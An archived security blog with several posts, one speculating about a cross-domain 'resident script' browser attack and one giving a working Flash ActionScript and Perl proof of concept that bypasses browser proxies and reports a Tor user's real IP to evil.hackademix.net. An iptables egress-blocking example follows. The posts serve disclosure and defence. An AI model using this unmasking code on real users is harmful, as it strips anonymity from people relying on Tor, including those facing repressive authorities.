Archive for the IE Category

After hearing me cry for help, my friend Sirdarckcat went hunting and entrapped a poltergeist which haunts IE only.

Is this the one Manuel Caballero was talking about?
Or was that a different cross-browser evilness?

However, I ain’t afraid of no ghosts :)

(Image: Casper on Paypal)

I would be very interested in learning some technical details of Manuel Caballero’s talk at BlueHat, titled A Resident in My Domain, but so far news is very scarce, fragmented and contradictory.

Its abstract is intriguing:

A Resident in My Domain

Do you believe in ghosts? Imagine an invisible script that silently follows you while you surf, even after changing the URL 1,000 times and you are feeling completely safe. Now imagine that the ghost is able to see everything you do, including what you are surfing and what you are typing (passwords included), and even guess your next move.

No downloading required, no user confirmation, no ActiveX. In other words: no strings attached. We will examine the power of a resident script and the power of a global cross-domain. Also, we will go through the steps of how to find cross-domains and resident scripts.

Then we’ve got two quite reticent posts by Nate McFeters, who was there but pretends he doesn’t remember well enough and/or he can’t disclose such an atomic bomb ;)

There’s some discussion at TSSCI, but it adds more questions than answers: the article draws similarities with two distinct old and fixed bugs, the nastier one affecting IE and the other Firefox; some comments speculate about an IE7-only, possibly patched, vulnerability; but why so much secretiveness if it was already fixed?
Nate, on the other hand, wrote that this is “a horribly serious issue that affects all browsers and is currently not fixed on any of them”.

Direct inquiries in the security circles I’m a member of brought nothing less ectoplasmic to the table.

Therefore, all the juice we’ve got so far is a couple of photos authorizing only the following statements:

  1. It is scary.
  2. It has something to do with JavaScript and IFrames.
  3. It definitely works in IE7.

If you can summon anything useful, you’re very welcome!

It’s really time to sleep in my timezone, but I just couldn’t resist when I read RSnake’s latest post about Deanonymizing Tor and Detecting Proxies.

The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.

This caveat has been preached even on the Tor download page itself, but nothing converts the non-believers better than some scary demos.

RSnake’s interesting proof of concept exploits JavaScript + LiveConnect, and it apparently works only on Gecko-based browsers with Java™ installed. I didn’t manage to make it work on Opera, even though it does support LiveConnect.

So I decided to defer bedtime a bit and put together my own quick deanonymizing proof of concept, which relies on the almost ubiquitous Macromedia® Flash® and works in any web browser supporting the Flash player, Internet Explorer included (no need for JavaScript, either).
The XMLSocket ActionScript object is used to bypass the browser’s proxy settings and connect to a tiny server written in Perl, listening on port 9999 and echoing the client’s IP.

Here’s the ActionScript code:

  // XMLSocket opens a raw TCP connection from the Flash player itself,
  // so the browser's proxy settings never see it.
  var socket = new XMLSocket();
  socket.onConnect = function(success) {
    // Nothing to report if the direct connection could not be made.
    if (!success) return;
    socket.onXML = function(doc) {
      // The server answers <ip>a.b.c.d</ip>; forward the address it saw
      // back over the (proxied) HTTP channel, where it can be compared
      // with the exit IP the web server sees.
      getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
        doc.firstChild.firstChild.nodeValue);
      socket.close();
    };
    // Any null-terminated message makes the server reply.
    socket.send(new XML());
  };
  socket.connect("evil.hackademix.net", 9999);

And here’s the Perl server:

  #!/usr/bin/perl -w
  use strict;
  use IO::Socket;   # also exports sockaddr_in, inet_ntoa and SOMAXCONN

  my $port = shift || 9999;
  my $sock = IO::Socket::INET->new(
    LocalPort => $port,
    Proto     => 'tcp',
    Listen    => SOMAXCONN,
    Reuse     => 1);
  $sock or die "socket: $!";

  my ($new_sock, $c_addr);
  while (($new_sock, $c_addr) = $sock->accept()) {
    # $c_addr is the packed peer address of the direct TCP connection,
    # i.e. the real client IP, not the proxy's.
    my ($client_port, $client_ip) = sockaddr_in($c_addr);
    # XMLSocket messages must be terminated by a null byte (\000).
    print $new_sock "<ip>" . inet_ntoa($client_ip) . "</ip>\000";
    $new_sock->close();
  }

Today’s lesson is: if you want to stay anonymous, you’d better turn off Java, Flash and any other plugin!
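As an added example (not from the post, and not part of the proof of concept above), here is the OS-level form of that lesson: an iptables egress policy that lets only the Tor process open new outbound connections, so a plugin's direct socket is rejected no matter what the browser's proxy settings say, plus a small audit of the live OUTPUT chain. The Tor user name debian-tor and the rule layout are assumptions.

```shell
#!/bin/sh
# Added example: make the plugin proxy bypass fail closed at the OS level.
# Assumption (not from the post): Tor runs as user "debian-tor" and the
# browser reaches it over loopback (127.0.0.1:9050), so "-o lo" is enough.

# Emit the rule set for review (pipe to "sh" as root to apply it).
egress_rules() {
    tor_user="${1:-debian-tor}"
    cat <<EOF
iptables -P OUTPUT DROP
iptables -F OUTPUT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m owner --uid-owner $tor_user -j ACCEPT
iptables -A OUTPUT -j REJECT --reject-with icmp-port-unreachable
EOF
}
# The final REJECT makes a bypassing plugin fail immediately instead of
# hanging on the DROP policy, which is what a user will actually notice.

# Audit a saved "iptables -S OUTPUT" dump (file path in $1): succeed only if
# the default policy is DROP, an owner match exists, and every ACCEPT rule
# is scoped to loopback, established flows, or the Tor uid.
audit_output_chain() {
    grep -q '^-P OUTPUT DROP$' "$1" || return 1
    grep -q -- '--uid-owner' "$1" || return 1
    ! grep -- '-j ACCEPT' "$1" \
        | grep -v -e '-o lo' -e '--ctstate' -e '--uid-owner' \
        | grep -q .
}
```

Run `iptables -S OUTPUT > /tmp/out.txt` as root and then `audit_output_chain /tmp/out.txt` to check an existing box.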

Update OCT-27

I’ve just learned that some months ago a guy called yawnmoth demonstrated an Unmasking Java Applet. Just like my Flash-based one, this also works in browsers, like IE, that don’t support LiveConnect.
The lesson above obviously applies, even more strongly.

Demos

Very short summary:

  1. IE pwns Firefox and Mozilla blames Microsoft for not sanitizing URLs before throwing them at other applications.
  2. Firefox pwns… all the world and Mozilla recognizes the same bug that had been blamed on IE affects Firefox itself.
  3. Mozilla devs fix their bug immediately, while people like Alun Jones (Security Microsoft Valued Partner) and Markellos Diorinos (IE Product Manager) deny such a bug exists at all, thus IE won’t be fixed.
  4. Profit!

And this time I can’t even insert my usual NoScript plug ;)
